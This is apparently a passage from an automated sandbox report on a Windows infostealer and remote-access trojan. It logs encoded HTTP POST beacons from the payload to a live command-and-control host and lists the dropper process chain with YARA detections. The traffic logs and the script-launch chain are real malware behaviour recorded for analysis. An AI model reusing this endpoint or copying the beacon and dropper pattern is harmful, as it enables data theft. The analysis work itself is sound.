                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:17.386255980 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:17.739690065 CET1032OUTData Raw: 5b 58 43 5f 59 55 5f 57 5e 5e 54 55 56 59 5a 5c 5f 5b 59 59 52 5b 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XC_YU_W^^TUVYZ\_[YYR[RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B%"<$='2(\8 ^=($4)[6T'X$[+3;$=&G!']*+


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        139192.168.2.75011037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:17.980673075 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:18.333393097 CET1300OUTData Raw: 5b 5e 46 5e 5c 59 5a 54 5e 5e 54 55 56 5c 5a 5b 5f 52 59 59 52 5d 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^F^\YZT^^TUV\Z[_RYYR]R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B0/0-\0"/ ^)%#38(.>W0?.$_$;]=&G!']*?
                                        Nov 5, 2024 08:14:18.783237934 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:18.858599901 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 33 06 2c 55 20 5c 3e 51 3c 3e 3c 5b 36 27 3f 59 2c 3d 06 5b 33 33 34 54 2a 2f 08 19 20 29 39 03 21 3d 34 14 20 07 2b 57 3e 31 2f 5a 07 10 25 1e 25 22 05 55 31 00 0a 5e 24 20 3b 5c 2a 3f 20 5b 36 2b 0d 5c 25 38 25 11 31 03 3b 14 38 39 0c 0a 2f 3b 2f 5c 3a 32 23 07 26 34 2c 54 0d 10 3a 0a 28 21 0e 1f 3e 5a 21 5d 26 37 20 56 22 2e 27 59 29 5c 33 08 3c 03 2e 5d 33 0e 30 57 21 0c 2e 0b 25 28 38 5c 33 0f 0e 15 26 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :3,U \>Q<><[6'?Y,=[334T*/ )9!=4 +W>1/Z%%"U1^$ ;\*? [6+\%8%1;89/;/\:2#&4,T:(!>Z!]&7 V".'Y)\3<.]30W!.%(8\3&%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        140192.168.2.75011137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:18.106998920 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:18.458550930 CET1032OUTData Raw: 5b 5b 43 58 5c 5d 5f 51 5e 5e 54 55 56 58 5a 5f 5f 53 59 5a 52 58 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[CX\]_Q^^TUVXZ__SYZRXRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$!,Y$028];; ?%00/7)=3'=?_$+4)&G!']*/
                                        Nov 5, 2024 08:14:18.927289963 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:19.011384010 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        141192.168.2.75011237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:19.138098955 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:19.489861012 CET1032OUTData Raw: 5b 5c 46 5e 59 5b 5f 55 5e 5e 54 55 56 53 5a 50 5f 52 59 5d 52 50 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\F^Y[_U^^TUVSZP_RY]RPRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.010Y31$T;/8<=C8$/4(>"T$&X'.408;)*&G!']*
                                        Nov 5, 2024 08:14:19.941071033 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:20.016305923 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        142192.168.2.75011337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:20.153501987 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:20.505295038 CET1032OUTData Raw: 5b 5f 43 5c 59 55 5a 5d 5e 5e 54 55 56 5b 5a 51 5f 5a 59 5f 52 5a 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\YUZ]^^TUV[ZQ_ZY_RZRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@'"+0=%Y3T+8$>68Z$[>6W$?:X'-3_0*&G!']*#
                                        Nov 5, 2024 08:14:20.973078966 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:21.052623987 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        143192.168.2.75011437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:21.180857897 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:21.536540985 CET1032OUTData Raw: 5b 59 43 5e 59 55 5a 57 5e 5e 54 55 56 52 5a 5e 5f 5b 59 5b 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC^YUZW^^TUVRZ^_[Y[RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@38[$[2'2;,(?)%3','X*=',"Y3.#08(>:&G!']*
                                        Nov 5, 2024 08:14:22.000458002 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:22.078519106 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        144192.168.2.75011537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:22.215579987 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:22.569195032 CET1032OUTData Raw: 5b 5d 43 59 59 54 5a 5c 5e 5e 54 55 56 58 5a 5a 5f 56 59 5c 52 58 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYTZ\^^TUVXZZ_VY\RXRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'?'=024^/8>6$^3+*-2Q3Z-3.<$#[>&G!']*/
                                        Nov 5, 2024 08:14:23.027071953 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:23.108422995 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        145192.168.2.75011637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:23.243865967 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:23.599149942 CET1032OUTData Raw: 5e 58 43 5c 59 59 5a 54 5e 5e 54 55 56 53 5a 50 5f 50 59 5d 52 5d 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YYZT^^TUVSZP_PY]R]RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G'"$^0-)$"\-(<[)%+3'(>"'*_$8'+7X+:&G!']*


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        146192.168.2.75011737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:23.871534109 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:24.224044085 CET1300OUTData Raw: 5e 5e 43 53 59 5b 5f 56 5e 5e 54 55 56 53 5a 5d 5f 50 59 5a 52 5f 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CSY[_V^^TUVSZ]_PYZR_RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2;%-=]$2$_/,)%73<4).6W'60>+%(?[=&G!']*
                                        Nov 5, 2024 08:14:24.692739010 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:24.772321939 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 58 33 38 01 0e 37 2a 2d 0f 3c 58 3c 5c 23 24 38 05 2e 2d 34 5c 30 30 20 1e 29 3f 0c 18 23 17 39 02 21 13 27 04 20 2e 27 1e 3d 0b 2f 5a 07 10 25 13 25 0c 20 0e 31 3e 05 06 33 0d 0d 5e 28 3f 28 5d 21 2b 0d 5c 26 05 31 1c 24 2a 05 53 38 07 3e 0e 39 38 0a 04 2e 0f 24 11 24 34 2c 54 0d 10 39 18 3e 31 38 55 3e 12 35 17 25 27 28 10 37 2d 3c 07 2a 3a 02 1b 3c 03 22 14 24 1e 1d 0f 20 32 2d 57 24 3b 38 5d 33 1f 2c 52 31 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9X387*-<X<\#$8.-4\00 )?#9!' .'=/Z%% 1>3^(?(]!+\&1$*S8>98.$$4,T9>18U>5%'(7-<*:<"$ 2-W$;8]3,R1"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        147192.168.2.75011837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:24.006117105 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:24.364764929 CET1032OUTData Raw: 5e 5d 43 59 5c 58 5f 57 5e 5e 54 55 56 5f 5a 50 5f 54 59 5f 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\X_W^^TUV_ZP_TY_R_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2$:'T8[/>%0(*>'"X037[=:&G!']*3
                                        Nov 5, 2024 08:14:24.828008890 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:25.105005026 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:14:25.105074883 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        148192.168.2.75011937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:25.229348898 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:25.583385944 CET1032OUTData Raw: 5e 59 46 58 5c 5e 5a 5c 5e 5e 54 55 56 53 5a 59 5f 51 59 5f 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YFX\^Z\^^TUVSZY_QY_R[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$!/3["'<\8;<^>5+$<?>>T$<"0='8<*:&G!']*
                                        Nov 5, 2024 08:14:26.041879892 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:26.121721983 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        149192.168.2.75012037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:26.247023106 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:26.602152109 CET1032OUTData Raw: 5e 5a 43 5a 5c 5d 5a 5d 5e 5e 54 55 56 5c 5a 5f 5f 56 59 58 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZCZ\]Z]^^TUV\Z__VYXR_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.0/093+8;0Z=$0/;=-003^';?)&G!']*?
                                        Nov 5, 2024 08:14:27.084187984 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:27.170645952 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:11:56
                                        Start date:05/11/2024
                                        Path:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\HcEvQKWAu2.exe"
                                        Imagebase:0xf80000
                                        File size:1'962'809 bytes
                                        MD5 hash:3A92479AA98E55499BFA33BC2EA35B64
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:02:11:57
                                        Start date:05/11/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe"
                                        Imagebase:0xf70000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                        Imagebase:0x410000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\ComponentSavesinto/fontReviewsavesinto.exe"
                                        Imagebase:0x610000
                                        File size:1'640'960 bytes
                                        MD5 hash:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 88%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat"
                                        Imagebase:0x7ff6687f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:02:12:08
                                        Start date:05/11/2024
